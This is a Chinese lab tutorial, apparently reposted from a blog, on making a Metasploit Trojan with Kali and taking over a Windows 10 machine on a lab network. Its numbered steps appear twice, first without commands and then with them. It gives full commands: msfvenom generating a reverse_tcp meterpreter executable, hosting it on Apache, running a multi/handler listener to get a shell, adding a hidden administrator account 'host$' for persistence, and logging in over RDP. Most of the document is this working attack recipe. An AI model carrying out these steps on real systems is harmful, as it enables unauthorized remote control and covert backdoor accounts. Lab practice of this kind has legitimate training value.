admin 管理员组文章数量: 887021
本文章仅供学习和参考!
欢迎交流~
目录
一、实验题目:使用kali生成木马,渗透Windows系统
二、实验内容:
使用kali中的Metasploit生成木马,控制Windows系统
三、实验环境:
1. 攻击者IP(kali):192.168.112.130
2. 靶机IP(Windows10):192.168.112.136
三、实验步骤:
1. 保证两个系统能相互ping通
2. 生成木马,在kali打开终端,输入以下命令:
3. 进入木马文件存放路径,将木马文件evilshell.exe复制到 /var/www/html,输入命令:
4. 进入目录 /var/www/html,将html目录下的其余文件删除,输入命令:
5. 开启apache服务,输入命令:
可用以下命令查看服务开启状态:
6. 在Windows10靶机上打开浏览器,输入kali的IP,访问kali并下载木马文件evilshell.exe
7. 开启postgresql服务,其端口号为5432,输入命令:
可用以下命令查看服务开启状态:
8. 查看端口,输入命令:
9. 开启msfconsole,输入命令:
10.设置攻击模块并运行,输入命令:
11. 在靶机中双击运行木马文件(evilshell.exe)
12. 获取目标主机shell,输入命令:
若出现乱码现象,可输入命令:
13. 输入ipconfig,查看靶机的IP地址:
14. 在靶机中添加一个隐藏用户(后面加$),并提升隐藏用户的权限,输入以下命令:
15. kali打开一个新的终端,使用远程桌面连接靶机(靶机需要开启远程连接服务),输入命令:
16. 使用 host$/密码 登录靶机,登录成功后,使用管理员权限打开cmd,添加一个新用户,添加成功则证明渗透成功!
一、实验题目:使用kali生成木马,渗透Windows系统
二、实验内容:
使用kali中的Metasploit生成木马,控制Windows系统
三、实验环境:
1. 攻击者IP(kali):192.168.112.130
2. 靶机IP(Windows10):192.168.112.136
三、实验步骤:
1. 保证两个系统能相互ping通
2. 生成木马,在kali打开终端,输入以下命令:
msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击者IP lport=监听端口 -f 后门文件类型 >/后门文件存放路径/evilshell.exe
3. 进入木马文件存放路径,将木马文件evilshell.exe复制到 /var/www/html,输入命令:
cp evilshell.exe /var/www/html
4. 进入目录 /var/www/html,将html目录下的其余文件删除,输入命令:
rm 文件1 文件2 ... 文件n
5. 开启apache服务,输入命令:
/etc/init.d/apache2 start
可用以下命令查看服务开启状态:
/etc/init.d/apache2 status
6. 在Windows10靶机上打开浏览器,输入kali的IP,访问kali并下载木马文件evilshell.exe
将文件下载到桌面,方便测试:
7. 开启postgresql服务,其端口号为5432,输入命令:
/etc/init.d/postgresql start
可用以下命令查看服务开启状态:
/etc/init.d/postgresql status
8. 查看端口,输入命令:
netstat -ntulp
9. 开启msfconsole,输入命令:
msfconsole
10.设置攻击模块并运行,输入命令:
use exploit/multi/handler //选择exploits
set payload windows/meterpreter/reverse_tcp //设置payload
set LHOST 攻击者IP //修改LHOST参数
set LPORT 监听端口 //修改LPORT参数
show options //查看需要设置的参数
run 或 exploit //运行攻击模块
11. 在靶机中双击运行木马文件(evilshell.exe)
12. 获取目标主机shell,输入命令:
shell
若出现乱码现象,可输入命令:
chcp 437
13. 输入ipconfig,查看靶机的IP地址:
14. 在靶机中添加一个隐藏用户(后面加$),并提升隐藏用户的权限,输入以下命令:
net user host$ /add //添加隐藏用户host$
net user //查看用户
net user host$ 密码 //为host$用户设置密码
net localgroup administrators host$ /add //将host$用户加入到管理员组中,从而提升权限
net user host$ //查看host$用户信息
15. kali打开一个新的终端,使用远程桌面连接靶机(靶机需要开启远程连接服务),输入命令:
rdesktop 靶机IP
16. 使用 host$/密码 登录靶机,登录成功后,使用管理员权限打开cmd,添加一个新用户,添加成功则证明渗透成功!
添加用户:
版权声明:本文标题:2021-12-09 使用kali生成木马,渗透Windows系统 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1724633774h781453.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论